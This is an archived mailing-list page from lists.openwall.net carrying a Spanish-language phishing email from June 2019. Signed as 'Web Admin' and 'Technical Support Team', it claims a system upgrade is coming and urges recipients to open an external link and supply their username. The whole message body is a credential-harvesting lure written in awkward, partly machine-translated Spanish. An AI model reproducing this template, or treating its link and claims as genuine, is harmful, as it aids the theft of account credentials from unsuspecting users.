lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date:   Wed, 05 Jun 2019 21:20:21 +0530
From:   Web Admin <zsanchez@...nsito.gob.pa>
To:     Recipients <zsanchez@...nsito.gob.pa>
Subject: Verifica tu e-mail

Estimado Usuario,

En nuestros mejores esfuerzos para proporcionar un servicio excelente a todos nuestros usuarios, estamos planeando realizar la actualización del sistema actual. El proceso tomará alrededor de 30 minutos.

Durante la actualización, las operaciones de sistema no estarán disponibles pero puede seguir trabajando en los datos sin conexión. Para evitar los correos electrónicos y mejorar la seguridad de su cuenta, los usuarios están autorizados para hacer clic o copiar y pegar este vínculo: http://admincenterdom.xtgem.com/index en su explorador y su nombre de usuario.

Una vez que se haya completado la actualización, puede observar algunos cambios en la interfaz y recibirá un mensaje nuevo en su inbox con detalles.

Los usuarios se aconsejan para responder a las instrucciones que se indican en su cuenta.

Por favor, informe de cualquier problema al técnico de soporte técnico. Nosotros nos apologizamos por cualquier inconveniente que esto pueda causar y que nos ofrecimos de nuestros mejores para completar este trabajo en el cortocircuito time posible.

Atentamente,
Technical Support Team.

Powered by blists - more mailing lists